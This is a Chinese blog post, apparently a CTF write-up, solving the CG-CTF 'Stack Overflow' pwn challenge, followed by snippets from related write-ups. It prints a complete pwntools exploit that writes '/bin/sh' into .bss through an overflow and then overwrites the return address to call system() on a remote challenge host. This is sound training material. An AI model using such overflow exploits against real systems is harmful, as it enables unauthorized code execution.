CG-CTF Stack Overflow(pwn)

最新推荐文章于 2023-08-11 10:52:28 发布
最新推荐文章于 2023-08-11 10:52:28 发布
阅读量740 收藏 1
点赞数
分类专栏: # PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43876357/article/details/104472213
版权

首先先拿到ida里面看一下,找一下溢出点

点进去A发现是一个大小为40的数组(0x28),但是可以接受64个字符,所以这里是第一个溢出点。
下面是对s进行输入,限制是n,点开n会发现n就在A的下面。


所以思路就是:我们可以通过溢出A来达到覆盖n的效果

然后我们点开pwnme函数会发现system函数,搜索字符串发现没有‘/bin/sh’,所以需要我们自己写入bss段。
exp:

from pwn import *

#p = process('./cgpwna')
p = remote('182.254.217.142',10001)
elf = ELF('./cgpwna')

p.recvuntil('your choice:')
p.sendline('1')

payload1 = 'a'*0x28 + '/bin/sh'
p.recvuntil("you can leave some message here:")
p.sendline(payload1)

system_addr = elf.symbols['system']

payload2 = 'a'*0x34 + p32(system_addr) + p32(0xdeadbeef) + p32(0x0804A0A8)
p.recvuntil("your name please:")
p.sendline(payload2)

p.interactive()

解释一下exp:
payload1是负责通过溢出A将/bin/sh写入bss段的
payload2中‘a'*0x34是输入的s到返回地址的距离
然后后面的参数是system函数的地址
再后面的0xdeadbeef是system函数的返回地址,这里随便写就可以
最后的是‘/bin/sh’的地址,也就是n的地址
最后exp就构造完成了 get flag!
 

 

 

43v3rY0unG
关注
专栏目录
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
攻防世界PWNstackoverflow(栈溢出盲打)题解
seaaseesa的博客
01-28 2009
Stackoverflow 这题,没有提供给我们二进制文件,仅仅有一个可交互的地址。由题意也可以知道,它存在栈溢出。这是一个栈溢出盲打的题目。 首先,就是确定栈溢出的长度 我们发现,当我们输入23个整数后,就发生了溢出报错,同时,我们也知道了,这个程序开启了canary机制,这正好被我们利用起来判断栈溢出的长度。 接下来,就是泄露栈数据了,主要依靠功能3,它会把数组里的数据相邻的去重后...
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2146
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
南京邮电大学CTF-PWN-Stack Overflow
Ceciiiilia的博客
04-13 574
终于开始学pwn了…今天第一次做出来这题,记录一下。 1、首先放到ida里查看函数情况,发现了fgets()函数 2、双击A追踪,发现A的大小为0x28(0x0804A0A8 - 0x0804A080),并且栈位置的的高位处就是n,所以可以填充0x28个'A',来溢出到n的位置。 3、 from pwn import * #p = process('./cgpwna')#...
CG-CTF Stack Overflow
weixin_43464124的博客
05-11 820
为了上800分也是够了… 题目地址:pwn 看了几篇wp,觉得写得总是差那么一丢丢意思 首先检查溢出点 通过双击A可以看到,A这个数组的大小为40 但其可以接受64个字符的大小 所以这是第一个溢出点 然后往下看 虽然明面上显示的是输入s是有限制的 限制为n 但是当我们双击n的时候会发现 n就在A的下面 因此我们可以通过A来溢出到n 在函数列表中我们可以看到有一个函数 名字叫做pwnme 这部明...
[BUUCTF-pwn]——[第六章 CTFPWN章]stack
Y_peak的博客
03-12 732
[BUUCTF-pwn]——[第六章 CTFPWN章]stack 题目地址: https://buuoj.cn/challenges#[%E7%AC%AC%E5%85%AD%E7%AB%A0%20CTF%E4%B9%8BPWN%E7%AB%A0]stack 思路 一个简单的栈溢出, 注意栈平衡就好 exploit from pwn import * p = remote('node3.buuoj.cn',25385) shell = 0x0000000000400537 ret = 0x0000000
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1720
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
BugkuCTF pwn overflow
ChaoYue_miku的博客
07-02 1771
** 0、在Linux中打开文件,使用file命令查看文件类型,使用checksec检查保护情况 ** 64位文件,未开启任何保护,尝试运行一下 ** 1、使用IDA 64 Pro打开文件 ** 查看主函数 存在栈溢出漏洞 ** 2、寻找后门函数 ** 存在一个get_shell函数,地址为0x400751 ** 3、构造exp ** from pwn import * #io = process('./pwn2') io = remote("114.67.246.176", 15587)
PWN做题笔记2-int_overflow(已校对)
qq_40923256的博客
04-19 248
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=1 如图,程序是一个32位ELF文件 chesec ida反编译,main方法中实现了登录功能,无溢出点 login方法中输入用户名和密码: 这里位数上0x19<40,0x199<512,因此无溢出 check_passwd实现对密码长度进行检查: 密...
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
攻防世界_pwn int_overflow(萌新版)
TedLau的博客
02-24 488
首发于鄙人博客:传送门 0x00 前言 重刷攻防世界,本人纯萌新,在本次刷题过程中,不能再想之前那样,做过就忘,我打算将我的思路尽可能的写成文章发在网站。 0x10 步骤 file与checksec步骤已省略 根据反汇编的意思,便可以知道buf的长度比dest的长度长,所以在strcpy的时候会发生溢出现象。 而如果我们的s的长度在3和8之间,那么我们便无法使得s...
Kernel pwn 基础教程之 Heap Overflow
最新发布
dzqxwzoe的博客
08-11 150
在如今的CTF比赛大环境下,掌握glibc堆内存分配已经成为了大家的必修课程。然而在内核态中,堆内存的分配策略发生了变化。笔者会在介绍内核堆利用方式之前先简单的介绍一下自己了解的内核内存分配策略,如有不对的地方欢迎师傅们指正。
NJUPT-CGCTF pwn2 StackOverflow [Writeup]
cossack9989的博客
12-30 2118
最近肥肠地想入门一下pwn,找了道题试了一下。 题目网址:StackOverflow 栈溢出啊。。虽然我水平很菜。。还是觉得挺有意思的 不扯了,先看题。 扔到32位IDA里面看看,观察一下,发现有两个很关键的函数message与pwnme,很显然message可以用来栈溢出,pwnme可以用来调用system函数,但是Alt+T之后并没有发现‘/bin/sh’,也没有提供libc.so,这
171222 pwn-CGCTFpwn150)
whklhhhh的博客
12-22 1665
1625-5 王子昂 总结《2017年12月22日》 【连续第448天总结】 A. CGCTF-cgpwna B. 简单的栈溢出,作为复习用的第一题233结果还是折腾了好久 基本概念不清啦很明显,message函数中存在栈溢出 A和n是全局变量,s是栈上的局部变量虽然s的长度受限,但是因为是全局变量所以可以通过A的溢出来修改n 它们在bss段,发现n紧接着A后面,A的长度是28字节,
PWN-canary学习
苗_的博客
02-10 1543
先简单介绍一下canary: Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中获取一个值,一般存到EBP - 0x4(32位)或RBP - 0x8...
虚拟机挑战解析:hgame-week4-easyvm与cg-ctf WxyVM
"虚拟机题目解析,包括hgame-week4-easyvm、cg-ctf wxyVM1/2,涉及虚拟机基础知识、数据处理及逆向工程" 虚拟机技术是计算机科学中的一个重要领域,它允许在单一硬件系统上运行多个操作系统实例。在网络安全和密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值